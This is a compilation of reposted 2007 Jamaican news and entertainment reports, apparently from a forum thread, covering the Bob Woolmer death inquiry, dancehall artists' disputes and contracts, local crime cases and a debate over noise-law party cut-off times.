Meanwhile, a high-profile police team, led by top investigator, Deputy Superintendent of Police Colin Pinnock, held a high-level meeting on the ground floor of the Pagasus as the investigations intensified.

THE STAR understands that the police last night interviewed members of the Pakistan cricket team. Aside from combing the room in which Woolmer was found for more evidence, the police also interviewed hotel staff who worked on the day his body was found.

The detectives also reviewed tapes from closed-circuit cameras at the hotel, which should give them clues as to who entered the room during the period in question.

The relationship between Beenie Man and the Rebel T fraternity is on the mend. Father Dozer spoke to One876Entertainment.com over the weekend about the recent entente struck between them

The peace was brokered by a mutual friend of the two who accompanied Beenie Man to Negril. Later on, the deejay was allowed to enter the venue and spoke briefly with Dozer backstage before he performed for free.

We have an understanding now but it is not fully concrete yet. He came to the show and he apologized for his behaviour, but we havent had the chance to sit down and talk in depth about what happened regarding Don Mafia. Were still working on it and hopefully, there will be a meeting soon and we can get things resolved, Father Dozer, owner of the Rebel T sound system, said.
Beenie Man had a show in Negril at the Jungle nightclub just a few days after the Spring Break show and risked the ire of that promoter just to make things right with Father Dozer.

Beenie Man ah my deejay so it shoulda never get to the point where it got to, where he was calling up my name on national TV and dem tings dehhim just hard-headed, and I wasnt going to beg him to come perform on my show, he must remember that the fans can make you or break you, Dozer said.

It is not clear when or if Beenie Mans mural which decorates the wall of honour at Rebel T Headquarters on Dumbarton Avenue, but which was defaced with white paint during the recent animosities will be returned to its former glory.

12-y-o sprayed with Baygon

An elderly shopkeeper is now before the court after being accused of spraying Baygon in the face of a 12-year-old boy he accused of 'easing his body' in the shop.

Calvin Brown, who is of a Unity district, St. Andrew, address, appeared in the Corporate Area Resident Magistrate's Court on Wednesday, and is charged with aggravated assault upon a child.

The allegations are that on February 23, at about 8 p.m., the complainant, along with some friends, went to the shop operated by Brown. It is alleged that while at the shop, Brown accused the complainant of 'easing his body' and then reportedly bent down behind the counter and picked up the can of insecticide.

According to the complainant's statement, Brown then pointed the can in his direction and sprayed. This reportedly caused the complainant's eyes to water and burn, his nose began running and there was a bitter taste in his mouth. These symptoms continued into the following morning, when the complainant told his mother about the incident and they made a report to the police.

A police party later went to Unity district where Brown was pointed out. He was taken to the police station and when informed of the charges, reportedly said, "A nuh him mi spray, a di whole shop mi spray." He was arrested and charged and later offered station bail.

When he appeared before RM Judith Pusey, a trial date of April 10 was set. He was also ordered to have his fingerprints taken.

Pulse InvestmentS Limited, organisers of the Rock the World fashion, beauty and concert series has decided to withhold 25 per cent of Spragga Benz performance fee, claiming that his actions on stage on Wednesday were in breach of the profanity clause in his contract.

The clause reads: ARTISTE will not use expletives, profane or indecent language as defined by Jamaican law during performance. ARTISTE recognises that the use of such language or other indecent behaviour will cause damage, loss or harm to the PURCHASER and agrees to compensate PURCHASER accordingly. The 50 per cent balance of the ARTISTE fee will be paid immediately after ARTISTE performance on condition that the ARTISTE complies with the terms of this agreement.

However, when contacted, neither artiste or booking agent had full knowledge of Pulses decision.

Dem probably contact Headline (Entertainment) but out of respect fi dem (Pulse), mi haffi guh find out what is what first before really making any comment, Spragga said.

When asked which songs he performed, Spragga said, Mi not even know, mi haffi guh review di tape cause yuh done know seh when yuh deh pon stage, yuh deh in a different world.

unaware of matter

Jerome Hamilton of Headline Entertainment, booking agents for Spragga Benz, said he was not aware of the matter either but promised to get back to The Star.

I dont know, I would have to investigate it and call you, Hamilton said.

The release issued on behalf of Pulse further stated that the company wished to categorically express its disapproval of the use of profane and offensive language by popular entertainer Spragga Benz, at Wednesdays opening night of the event, held at the One Love Jamaica Village, New Kingston.

Apology to public

Further, Pulse wishes to apologise to the members of the public in attendance as well as the sponsors of the event, for what it considers to be inappropriate behaviour at an event billed as the best of the best of Jamaicas talent, creativity and entertainment. Benz profanity was particularly unfortunate, as it marred a well-executed production of excellent performances from Jamaicas outstanding singers and DJs Richie Spice, Beenie Man, Ninja Man and Shaggy.

Pulse officials say that they are reminding all entertainers performing at Pulse events, especially the current Rock the World series, that it will enforce its agreements so as to ensure that events are both entertaining and in good taste.
The Rock the World concert will end on Sunday, March 18, with performances from Buju Banton, Sizzla, Tanya Stephens and Tessanne Chin.<

LA Lewis does it again

LA Lewis has done it again. The greatest self-promoter Jamaica has produced in the 20th century, the deejay LA Lewis, is one of the feature articles on the BBC website, appearing as the sole topic in a blog entitled Meeting a Reggae Superstar..
Here is a snippet from the blog written by writer Alison Mitchell.

silver vehicle pulled up at the kerb alongside us and a grinning face leaned out of the drivers window, microphone in hand, words screaming out of the megaphone. Here for de cricket? You English? Yeah mon, come to de after-party! I play at de after-party, Im LA Lewis, reggae superstar! Every person in a hundred mile radius must have heard the invitation too.

Next thing, he was climbing out of the car and we got the full effect of his get-up. Spangly black and white shirt, shoulder padded jacket, black cowboy hat and shiny pointed boots. He posed for photos as if he was Michael Jackson, looking like he really could have been a superstar.

I asked one of our hotel staff about him and he burst out laughing. Apparently LA is the ultimate self styled superstar, a DJ true enough, but his success borders on negligible, one person telling me that he has been knocking on the door for almost 20 years.
He is infamous in these parts though, seemingly looked upon with gentle mocking affection yet also with admiration for his sheer desire and inimitable determination to make good. His forte seems to be self-publicity, to which you can only take your hat off to the man, and that is what the people of Jamaica tend to do

You can read the rest at http://www.bbc.co.uk/blogs/tms/2007/03/mee...superstar.shtml

Moral of the story: You dont have to be even within shouting distance of good to be famous and LA Lewis is a shining exemplar of that unfortunate little aphorism.

Pakistan cricket coach dies

THE MAJOR Investigation Task Force (MIT), the island?s top sleuthing unit, is now trying to ascertain the circumstances which led to the death of the Pakistan team coach Bob Woolmer.

Yesterday forensic and evidence gathering teams of the Jamaica Constabulary Force (JCF) visited the Jamaica Pegasus hotel, in New Kingston, where the Pakistan team is staying, searching for clues.

The police declined to share information related to the investigation, which is being led by Deputy Superintendent of Police (DSP) Colin Pinnock.

Woolmer, 58, died at the University Hospital of the West Indies (UHWI) at 12:14 p.m., approximately 30 minutes after he was taken to the Accident and Emergency section of the hospital.

An autopsy to determine the cause of death is to be done, but this may not take place until his wife arrives in Jamaica from South Africa.

Despite Pakistan officials saying that a coroner?s inquest will be launched, Assistant Commissioner of Police (ACP), Owen Ellington, who has responsibility for Cricket World Cup security locally, told The Gleaner that such a decision has not yet been taken.

?It is a normal thing to do, but may not be necessary in every case,? he said when asked to confirm whether a coroner?s inquest will take place.

?That would be a decision instigated by the post mortem examination,? ACP Ellington added.

He also said that like all sudden deaths, the police are treating it as a homicide. He said the police will be interviewing several persons who may have come into contact with Woolmer before his death.

Pakistan?s media manager, P.J. Mir, told journalists yesterday that Woolmer was discovered lying in the room by hotel workers at about 10:45 a.m. He said the former England player and South African coach was attended to by doctors before being rushed to the UHWI, which is some 15 minutes away by car. It is, however, unclear why he did not arrive at the UHWI before 11:45 yesterday.

Distraught

Woolmer, whose reign as Pakistan coach would have ended in June, was distraught after his team lost to Group D minnows, Ireland, in their ICC Cricket World Cup match on Saturday and became the first team to crash out of the tournament. Pakistan had entered the tournament at No. 4 in the ICC rankings.

?I?ve experienced a few bad days in my life and this ranks pretty highly with ones that I have experienced,? Woolmer said at a press conference on Saturday after the loss.

Mir said tha distraught, Woolmer retired to his room at 7:00 that evening and was not seen again until his uncon-scious body was stumbled upon.

Mir was among those who saw Woolmer in his unconscious state in the hotel room and was also at the UHWI when the doctors pronounced him dead.

He painted a picture which suggested that Woolmer may have struggled in his last moments inside his hotel room.

?When I reached the room, he was lying on the floor with his mouth wide open and there was blood in the bathroom and there was vomit all over the wall and there were signs of diarrhoea,? Mir said.

A statement from the High Command of the JCF said yesterday that Woolmer was pronounced dead by a medical team led by Drs. Simone French and Asher Cooper after being rushed there by an ambulance team.

?The entire Pakistan team and management are shocked and saddened by his passing,? Mir said moments after exiting the UHWI hospital.

?His next of kin has been informed and we extend our deepest condolences to his family,? he added.

Prime Minister Portia Simpson Miller also offered condolences at the sudden death of Mr. Woolmer.

?A dark shadow has been cast on the ICC Cricket World Cup and our hearts go out to the family of Mr. Woolmer and the Pakistan cricket team,? the Prime Minister said in a statement released by the Jamaica Information Service.

Meanwhile, Chief Executive Officer of the ICC, Malcolm Speed, said in a television interview yesterday that the passing of Woolmer is a loss to the cricketing world.

Blood definitely ran during the Red, Green and Gold themed video shoot for Inner Circle and Junior Reid's latest collaboration. YardFlex.com got exclusive access to the set. According to Bebe, organizer and son of Inner Circle band member Ian Lewis, it was an impromptu decision to shoot the video "because all of the artistes were in town at the same time." Rapper Akon also supported the production, as he recording literally across the street in Circle House Studio with his Konvict cellmates.

Rockers, the self-proclaimed rasta fashion lifestyle brand was the designer of choice for the celebrities and models. I must admitted that in some scenes the rasta colors were overwhelming but overall it was a good look. Reknown DJ Tom La Roc did the juggling on the wheels of steel with two Rihanna look-alike cuties while a few professional skateboarders held it down to ensure that the directors, barbecue treatment was realized. Bebe wore many hats, producer, director, and production assistant. It was fun to watch him work. It was exciting and tiring at the same time, at one point he commented that "this director work isn't as easy as it looks." The new paparrazi online entertainment magazine, celebrityoffsprings.com, that's schedule to launch early April has an in depth interview with Bebe.

The set had mad traffic in and out for most of the afternoon, Akon, Soulflower, Johnny Dread, Gillie and Robbie Marley were among the celebrities that supported the last minute video shoot. Eventually The Miami Herald showed up, as well as other photographers from other media houses.

Virgin drops Beenie Man?

There is a document circulating in the entertainment community that Virgin Records, the internationally known British recording label, has dropped Beenie Man from its roster of acts.

However, when Beenie Man was contacted, he laughed off the claims that he had been dropped.

Virgin no exist again, it have a merger with a next company, so right now, mi a look fi balance back my career. My contract with them is up this year well, at least from the year start, it up --- and I wasnt going to sign back with them, Beenie Man told One876Entertainment.com.

The merger that Beenie Man is referring to is that Virgin, originally founded in 1972 by Richard Branson and Nik Powell, being sold first to Thorn EMI, and then merged with Capitol Records last year to create Capitol Music Group.

This latest development has come in the wake of reports that Beenies last album, Undisputed racked up anaemic sales.

In the changing recording universe where major companies are in the process of changing from physical distribution to digital distribution, a lot of acts are being affected. The Capital/Virgin merger has led to at least eight other acts losing their recording contracts.

I wasnt going to sign back with them anyway. Mafia House is going to put out my next album, Beenie said confidently.

So this marks the end of Beenies association with Virgin which began in 2000. The deejays previous albums fared much better than his latest effort. 2002's Tropical Storm, which debuted at No. 1 on Billboard's Top Reggae Albums chart and No. 7 on the Top R&B/Hip-Hop Albums tally, spawned the hit Feel It Boy featuring Janet Jackson, and moved 272,000 copies in the United States, according to Nielsen SoundScan. Art And Life, widely considered a commercial disappointment for executives at Virgin Records, did not move mega units even after Beenie Man teamed up with Arturo Sandoval and Wyclef Jean of The Fugees (on Love Me Now). It sold 386,000 copies in the United States, again according to sales tracker SoundScan.

Remember that Beenie Man broke through in the US market in 1998 with the Many Moods Of Moses set for VP Records which contained the hit dance song, Who Am I, which had a strong run on the Billboard Rap chart and leading urban radio stations like Hot 97 in New York City. That album and song actually gave Virgin administrators the impetus to sign him in 2000.

Beenies biggest break came in early 2004 with the release of a remix of Dude featuring the crisp vocals from Ms. Thing and rhymes by Shawnna.

Reports of Sinbad's demise have been greatly exaggerated. Following in the (not-so) proud tradition of Jaleel White, Kel Mitchell, and Jon Heder, the comedian has been dogged by rumors of his premature demise. Like all Web-based rumors, this one spread through across the country in a matter of minutes.

Folks curious about the comedian's condition pushed Sinbad searches to an all-time high. Queries on the funny man jumped 142% yesterday and are still bombarding the Search box today. Related searches on "sinbad death" and "sinbad comedian" also pelted the Buzz as curious fans came to the Web for a definitive answer.

As with the other celebs who have fallen victim to this particularly pernicious rumor, it turns out Sinbad is alive and well. Now if only we could start a rumor that would get "First Kid Part II" into production...

Students of the Greater Portmore High School in St. Catherine cry openly at the school yesterday, after news spread that one of their schoolmates was shot and killed. Fifteen-year-old Tavia Smith and her six-year-old brother Tajax were murdered at their Portmore Lane home in the parish Wednesday night. - Norman Grindley/Deputy Chief Photographer

Rasbert Turner and Latoya Grindley, Gleaner Writers

Political leaders and advocates for children were among those who yesterday expressed shock while condemning the gruesome murder of the two children who were gunned down at their home in Portmore, St. Catherine, Wednesday night.

The children's father, Neville Smith said that he has given up on life as a result.

"I have nothing to live for now as they have taken all that I was living for. Nothing is left, I am now empty," said Mr. Smith.

Shocked and saddened

Mary Clarke, children's advocate, said that the office is shocked and saddened at the news of the killings.

"As a society, we should try to see children as trusting and vulnerable, in need of our love, care and protection, and not as objects to be violated, abused, treated violently for whatever purpose," said Ms. Clarke.

Police statistics show that last year, 65 children were killed in Jamaica. This was a decrease from 2005 when 89 children were murdered. Sixty-four children were killed in 2004.

Neville Smith told The Gleaner that his daughter, 15-year-old Tavia, and her brother Tajak, six, were at home at Robins Close off the Newland Road, about 7:45 p.m., when explosions were heard. Three men were seen running from the premises to a waiting white Toyota Corolla motor car in which they sped away.

His worst fears were realised when he walked to the grill of his veranda and first saw Tavia with what appeared to be gunshot wounds to the forehead in a pool of blood. Her sibling was found inside the house with gunshot wounds, he too was dead.

Jamaica Labour Party spokesman on National Security, Derrick Smith, said that he was extremely outraged by the brutal slaying of the children.

"It is a shame that such callous disregard for the lives of our children is being displayed in the midst of hosting Cricket World Cup 2007," said Mr. Smith.

"But it will be an even more serious blight if it continues unabated for the rest of the year," added the Member of Parliament.

Betty-Ann Blaine of Hear the Children's Cry said: "Children define and reflect who we are, and it (the murder of the children) says something about us as a society that ...the adults are incapable of protecting them ...".

Neville Smith told The Gleaner that he is a sub-contractor and to the best of his knowledge he has done no one any wrong nor is he involved in any wrong doing. The mother of the children had to seek medical attention as a result of the trauma.

Meanwhile, the school community has also expressed shock at the gruesome manner in which the children were killed. Tavia was a student at Greater Portmore High School and Tajak attended Southborough Primary in the parish.

Principal of Greater Portmore High, Eric Scott, became overwhelmed by the saddened atmosphere that had engulfed the school and subsequently broke down in tears.

"This is just a senseless killing. There is no safe zone anywhere, I mean no one can escape the wrath of modern day criminals," said Mr. Scott.

When the news team arrived at the school yesterday morning, students were seen standing in groups discussing the previous night's events.

In Tavia's classroom her classmates sat in groups, not saying much but their facial expressions and eyes told all they were feeling inside.

Tavia's best friend who stood in a corner reminisced on what her last words were to her.

"When I was leaving her at the bus stop after school I said tomorrow," said the friend, while she stared at the wall.

Meanwhile, teachers were busy lending support to the students but they themselves had a hard time dealing with it.

One teacher said: "Is just yesterday I talk to her".

In a counselling session with one of the school's guidance counsellors, the classmates wailed uncontrollably many times drowning the words of the counsellor.

Selector-turned-deejay, Tony "Mentally Ill" Matterhorn, a.k.a. "Man From Mars", may have another hit on his hands, but you just may think it's soca singer, Kevin Lyttle crooning.

Nothing about him is constant, not his name, nor his style and Matterhorn says he knows people had some problems distinguishing him from Lyttle when the song, On Your Knees, featuring Alaine was first released.

"People say me sound like him (Lyttle). Dem nuh expect say Matterhorn fi a sing, but mi did sort of sing inna Dutty Wine whe me did a semi-sing," he said.

Matterhorn, however, says though it may surprise some that he can sing, "a from long time me did a sing, but me did get into the selecting thing, but me can hold a note."

Matterhorn says though it's a 'love song' it's one with conflicts and he wanted it that way, because that's how love goes.

"Me did wha do a song wha contradict itself and have two sides with a man and a woman. The woman is saying that the man is telling lies and cheating, but he is saying he isn't. There are actually faithful men out there. No matter what, I wanted it to be controversial," he said.

He also says his personal experiences had an impact on the song: "I had a relationship a long time ago where the girl accused me of cheating and I wasn't. Then I was in Canada and I was talking with some friends and they were saying that men cheat and women cheat too so is just basically that way that the song come about."

Matterhorn is now over the heartbreak of that relationship and it seems he learnt a lot about love on the way: "I'm in love with my music now. About 90 per cent of those people you hear talking about love is a fake love. Back then, it was stronger, these nowadays ones are more sex related...I want to bring it back to the old days. I love my girlfriend and I love my kids, so I'm in a comfort zone right now," he said.

He says thus far he has been getting a lot of positive reviews from the public regarding the song: "It's been good so far. Last week I was in New York with some friends and dem come up to me a say 'yo dog, you make friends with muscles cry.' All bad man love di song, garrison man dem love it. Most people all now can't believe is Matterhorn that."

Matterhorn also says fans should expect to hear more love songs from him in the near future. "Actually I have another song that will be coming out soon, I already have the title for it, it's, I'm Gonna Be. It's talking about people who are in love."

Promoters want later dances

Night noise laws may be in effect to cut noise nuisances for citizens, yet it has become quite a nuisance for promoters and patrons alike.

Section 3 of the Noise Abate-ment Act, which came into effect in 1997, makes clear that "no person shall, on any private premises or in any public place at anytime of day or night

(a) sing, or sound or play upon any musical or noisy instrument; or

(cool.gif operate, or permit or cause to be operated, any loudspeaker, microphone or any other device for the amplification of sound, in such a manner that the sound is audible beyond 100 metres from the source of such sound and is reasonably capable of causing annoyance to persons in the vicinity."

However promoters are finding it increasingly hard to work with the stipulated 2 a.m. cut-off time, especially since Jamaicans are known for waltzing into a fete no earlier than 12 a.m.

According to promoter Dennis Ennis "I have gone to Bermuda and as clock strike 3 (a.m.) sound lock off. It is something you have to instill in people. Law is there but police have to use discretion. Law makes way for discretion. It is the culture. If you want dance to lock off 2 o'clock you have to educate the people bout time. Based on the nature of event, police have to use discretion. If you know show a go lock off 2 o'clock people will come out early. Two o'clock people just a get ready fi come a show."

The party raved all night to the music of Kurt Riley, Mixmaster MC and DJ Billy at Slips, the soca party held at Students Union, University of the West Indies, last Saturday. Patrons tend to like when the party goes beyond the stipulated 2 a.m. cut-off time. - Nathaniel Stewart

Patron Simone Chambers ex-plained that the issue is two-sided as patrons need to take responsibility and obey the laws. She also argues that the rule needs to be changed for some events and venues. "It can stay at 2 a.m. for places like Mas Camp but campus events and stage shows should go on to 5:00 a.m.," she said.

At the University of the West Indies (UWI), a lock-off time of 2 a.m. is usually enforced. C.E.A.C (Cultural and Entertainment Affiars Chairperson) of the Guild, who oversees all campus events, Andre-Majhail Willams explains that 3 a.m. is the latest a party on campus is allowed.

"When it comes on to UWI, 2:30 is the usual cut off time so we try to encourage patrons to come out early. Sometimes they do but there are those who don't mind, they want to make a late appearance. On campus people live here so we have to be considerate of that," Willams stated.

To extend a party past 2 a.m. may involve an incentive for the police. Julius Morgan, a pro-moter for Rum and Roses and Rhythm and Booze explained that he hasn't paid off the police but he has heard of persons who have. Another promoter who wished to remain anonymous claims "you have to pay them (the police) when dem come fi lock it off. Yuh haffi fi gi dem a ting fi mek di dance gwaan. They come and ask fi money and seh dem wi lock off the dance. Sometime yuh gi dem a J$10,000."

According to Ennis, the best way to deal with the situation is to change an outdated law, "the law needs to be amended. It's an old act, it needs to be amended. There are some things in the law from 1887, when the police force was established, that are still in effect from then. Development and technology improved and advanced so it needs to be amended, if not, educate the people and enforce that two is two right across the board" he said.

Hanover

The DongoRgon Ninja Man, Shaggy and Beenie Man were the artistes who ignited the eight staging of the Spring Break Show at Long Bay Beach Park in Negril on Saturday night.

Close to 50 acts, including some not originally billed for the event, took the stage in the show which got under way shortly after 11 p.m. with local acts such as Accent Dougall and Mr. Groove from Hanover and continued until daybreak. But the major segment kick- started shortly after 2 a.m. with Fantan Mojah, who galloped on stage, jumping and chanting "welcome the fire child". The venue was literally blazing as patrons lit aerosol canisters and held their lighters high. He was followed by Powerman, Singer Jay, Anthony B, Don Mafia, Ward 21, Junior Cat, Gyptian, I-Wayne and Bascom X, among others.

Captain Barkey and Wickerman took the stage at approximately 4 a.m., and several minutes later summoned Ninja Man who emerged in a suit of full white sporting feathers on his head, evoking a blaze of lighters and cheers.

The Dongorgon called up his little daughter Mumzal to defend his honour, and she proceeded to lash out against those deejays whom she said have tried to clash with her father, proclaiming herself as "the daughter fi dancehall" as she did so.

Another eruption

Spice and Erupt joined the Ninja, who, a short while later summoned Shaggy, which brought the venue into a frenzy as women ran to the front of the stage to get a closer look at Mr. Bombastic, who had pranced onstage, belting out the lyrics to his hit Church Heathen.

Aidonia and Lady Saw who was raunchy as ever, and Capleton were next. They were followed by Sizzla who called Beenie Man to the stage resulting in another eruption. Beenie Man told the crowd he had decided against performing at the show but changed his mind. He got a brotherly hug from Josie Wales who then urged the patrons to "lef Beenie Man and Bounty when yuh si dem a war". Mavado, the closing act, followed. But before the end of his performance, patrons started exiting the venue.
